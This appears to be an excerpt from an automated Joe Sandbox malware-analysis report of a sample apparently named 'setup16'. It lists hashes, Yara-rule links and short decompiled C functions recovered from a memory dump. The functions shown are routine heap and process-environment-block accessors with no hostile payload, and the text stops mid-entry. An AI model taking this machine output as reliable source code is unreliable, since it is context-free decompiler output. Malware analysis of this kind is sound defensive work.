                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                                                                                                                                        • Instruction ID: c170c5bc1bcec3e2be6c83ef3bd58dee3e88206525ec214c5e085a041931dbf6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0AD0A9315012809EEF21AB10CA1876C33B6BFC030CF5820758A4A0A862C33E7A0AD700
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049DAAB0 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E049DAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                                                                                                                                                                        0x049daab6
                                                                                                                                                                                                        0x049daabb
                                                                                                                                                                                                        0x04a2a442
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2a448
                                                                                                                                                                                                        0x04a2a454
                                                                                                                                                                                                        0x04a2a454
                                                                                                                                                                                                        0x049daac1
                                                                                                                                                                                                        0x049daac1
                                                                                                                                                                                                        0x049daac6
                                                                                                                                                                                                        0x049daac6

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                                                                                                                                        • Instruction ID: 4542a6692d4ad24a6b5188f13be2984a60d9ac9812ca711d2a27621017ae7aab
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50D0E939352D90CFD716CF1DC554B1573A9BB44B44FD545A0E501CBB61E62CE954CA00
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A4A537 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E04A4A537(intOrPtr _a4, intOrPtr _a8) {

				return L049E8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                                                                                                                                                                        0x04a4a553

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                                                                                                                                        • Instruction ID: 69c11af58b562a4bc51e8b40f16af78a926001bf1d2ff3de4322df2ff71279fe
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9EC01232080248BBCB12BE82CC00F267B2AEB94B60F008024BA080B5608632E970EA84
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049CDB40 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E049CDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L049E4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                                                                                                                                                                        0x049cdb4d
                                                                                                                                                                                                        0x049cdb54
                                                                                                                                                                                                        0x049cdb5f
                                                                                                                                                                                                        0x049cdb56
                                                                                                                                                                                                        0x049cdb56
                                                                                                                                                                                                        0x049cdb5c
                                                                                                                                                                                                        0x049cdb5c

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                                                                                                                                        • Instruction ID: fd52bdec38c9fde09a8a216bedea58481b8fcf80bae3d723ba7e86868f355f38
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9AC08C30280A00AEEB221F20CD01B1036A4BB40F05F4400B06300DA0F0EB78E801EA00
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049CAD30 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E049CAD30(intOrPtr _a4) {

				return L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                                                                                                                                                                        0x049cad49

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                                                                                                                        • Instruction ID: a50ce2de5a07ca3c188a6b87fd7db0c8059a0f88a81da6ceedf3b1cdafe80388
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6C08C32080248BBC7126A86DD00F117B29E7D0B60F000020B6040A6618932E860D588
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049F36CC Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E049F36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L049E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                                                                                                                                                                        0x049f36d2
                                                                                                                                                                                                        0x049f36e8
                                                                                                                                                                                                        0x049f36d4
                                                                                                                                                                                                        0x049f36e5
                                                                                                                                                                                                        0x049f36e5

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                                                                                                                                        • Instruction ID: f9f0229488bd103c7fe1274a896af8b53bd207da859759b39dc6bff34771acea
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8C09B75155440FBEB265F30CD51F257258F744E65F6407747321495F0D56DBC40D608
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049D76E2 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E049D76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                                                                                                                                                                        0x049d76e4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d76f8
                                                                                                                                                                                                        0x049d76fd

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                                                                                                                                        • Instruction ID: 57c711cb6c5286f21eb03ae194dc6708edbc4b3f9c76525a7cb3d8776e439478
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3BC08C701411805AEB2A6B88CE20B307658BB48708F8809FCAA01094A1D369B802C209
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049E3A1C Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E049E3A1C(intOrPtr _a4) {
				void* _t5;

				return L049E4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                                                                                                                                                                        0x049e3a35

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                                                                                                                        • Instruction ID: 8e1f9b7476eaa99806832d321d75f25a3223afaedb032798581623b6d28bd356
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0DC04C32180648BBDB126E46DD01F157B69E794B60F154021B6040A5618576ED61D99C
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049E7D50 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E049E7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                                                                                                                                                                        0x049e7d56
                                                                                                                                                                                                        0x049e7d5b
                                                                                                                                                                                                        0x049e7d60
                                                                                                                                                                                                        0x049e7d5d
                                                                                                                                                                                                        0x049e7d5d
                                                                                                                                                                                                        0x049e7d5d

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                                                                                                                        • Instruction ID: b1960aacd16dea494abc69bf90b0427fd5a559aa735e5574ca19e7ddeb169981
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8B09234301941CFCF16DF19C080B2533E8BB44A40B8400E0E400CBA20D229E8408900
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049F2ACB Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E049F2ACB() {
				void* _t5;

				return E049DEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                                                                                                                                                                        0x049f2adc

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                                                                                                                        • Instruction ID: cfdd47455d2f956cab59490dde43adcdb65dd8b3426b967a189dd5b876da8a41
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6CB01232C10940CFCF02FF40C610B197331FF40750F0584A090012B930C22CBC01CB40
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A098A0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 4aa5553cd4a8972090a41036d20d97153cb2992521b192af93837a78bac7d462
                                                                                                                                                                                                        • Instruction ID: 75fc7dab31a747b5b41774b71f06e8f077541dc1037df92c493b8f708acf201b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4aa5553cd4a8972090a41036d20d97153cb2992521b192af93837a78bac7d462
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A90026130105402F102616944146060409D7D1389F91C412E1415556D8665E953B172
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A09820 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 7e794f464409366279ab4912d4ba3f19cc0e3014cb5b823082d005ca8f14cc83
                                                                                                                                                                                                        • Instruction ID: 1c1a6134e7e194b961335d425141f4f610e3044e01840d84fd954a182fdcacea
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e794f464409366279ab4912d4ba3f19cc0e3014cb5b823082d005ca8f14cc83
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB90027124105402F141716944046060409A7D0285F91C412A0415555E8695EA56BAA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A0B040 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 296a0daaf93cf99e0f27e385cba9c4b70a57c5f4d66ab28e7a2eb4ba472686ce
                                                                                                                                                                                                        • Instruction ID: d01ab7a7c4819bf7ad86bef039183240f16bcb1c2d992185ab55dd7b526dbebd
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 296a0daaf93cf99e0f27e385cba9c4b70a57c5f4d66ab28e7a2eb4ba472686ce
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E39002A1601190436540B16948044065415A7E1345391C521A0445561C86A8E855A2A5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A095F0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 1912496f7181fb59b862b8230c6abc82aab3e8a38bb4fc848a55b0d8db273346
                                                                                                                                                                                                        • Instruction ID: a91fd6e666fb917300e01d4c7328c12c5982997fb39ad1603e7231bfd44afb3b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1912496f7181fb59b862b8230c6abc82aab3e8a38bb4fc848a55b0d8db273346
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B90027120105802F10461694804686040597D0345F51C411A6015656E96A5E8917171
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A099D0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 1aaf11c97e4efddec482d13e5eb68a8bac7c96293b5ce4adeff4ef3a26052ff4
                                                                                                                                                                                                        • Instruction ID: b6b5beb7ade039cc481ae91e27e09f70d692273a986439b6734b54516f0befeb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1aaf11c97e4efddec482d13e5eb68a8bac7c96293b5ce4adeff4ef3a26052ff4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A79002A121105042F10461694404706044597E1245F51C412A2145555CC569EC616165
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A09520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 8026f1cd9320ae823173adeb0c602548bc7d1f125cd6cd47d4ea627b99cf1409
                                                                                                                                                                                                        • Instruction ID: d0160887ac6834ae45eb6b660397a3c0544bc4b486285b3c68e8cb525722699a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8026f1cd9320ae823173adeb0c602548bc7d1f125cd6cd47d4ea627b99cf1409
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 599002E1201190926500A2698404B0A490597E0245B51C416E1045561CC565E851A175
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A0AD30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 1d665ba2554135dbf98ee18dc46ec3ba445142f073705c05c967f0d23dd8f912
                                                                                                                                                                                                        • Instruction ID: ef72ca036607a2de8aa4477d2a10aa369d1107ec6bc24994e1e6c289b9fce249
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d665ba2554135dbf98ee18dc46ec3ba445142f073705c05c967f0d23dd8f912
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3900271A0505012B140716948146464406A7E0785B55C411A0505555C8994EA5563E1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A09560 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 120f3777486645e0bd6112f944dde1a6f6bcbc2d4a045a0d8448624483989b48
                                                                                                                                                                                                        • Instruction ID: 75e5f6e4c574d2c73de44b6bba99e0d0a5286e8255eeb1b18de95682be5612fc
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 120f3777486645e0bd6112f944dde1a6f6bcbc2d4a045a0d8448624483989b48
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4E900265221050022145A569060450B0845A7D6395391C415F1407591CC661E8656361
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A09950 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 5d0737d4c9ee9d455a5fa32b35b9d5ca175796c525eb75e8514a4d5b0b48347f
                                                                                                                                                                                                        • Instruction ID: d35a192814c34a7ec4cc35ab9f6c89cbc8288f4177a3a4718ba556ab62cac759
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d0737d4c9ee9d455a5fa32b35b9d5ca175796c525eb75e8514a4d5b0b48347f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 189002A120145403F14065694804607040597D0346F51C411A2055556E8A69EC517175
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A09A80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 9e6dd08930949b927e01fbe1529d9d40eea08b9fb688f6992e1ac0baf5ee20ca
                                                                                                                                                                                                        • Instruction ID: 8e55010122254534b4385af04ff228a4fb37a2c86dd7f5de563a3ab8ddd3565f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e6dd08930949b927e01fbe1529d9d40eea08b9fb688f6992e1ac0baf5ee20ca
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4090026120149442F14062694804B0F450597E1246F91C419A4147555CC955E8556761
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A096D0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 3fc4f20297e2f9354bc1ec387dc015d1f4d536f9a4a58cecd4e5b9e7816b8fec
                                                                                                                                                                                                        • Instruction ID: f39b9e1c9d2522967e39dff33aab09f4982201467870a000b05617b2eea8174e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3fc4f20297e2f9354bc1ec387dc015d1f4d536f9a4a58cecd4e5b9e7816b8fec
